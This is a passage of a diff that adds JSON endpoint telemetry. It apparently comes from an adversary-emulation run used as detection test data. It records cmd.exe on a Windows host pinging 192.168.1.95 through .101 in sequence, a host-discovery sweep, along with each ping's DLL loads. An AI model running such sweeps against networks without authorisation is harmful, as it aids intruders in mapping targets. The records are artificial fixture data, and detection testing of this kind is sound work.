"event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572436990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "event_type": "process", + "pid": 4036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572441990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.95", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2204, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "process", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572446990000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.96", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4776, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "process", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572451840000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.97", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4800, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "process", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572456990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.98", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2992, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572457130000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457300000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "process", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572461990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.99", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2444, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "process", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572466830000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.100", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3592, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "process", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572471990000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.101", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 976, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572472130000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + 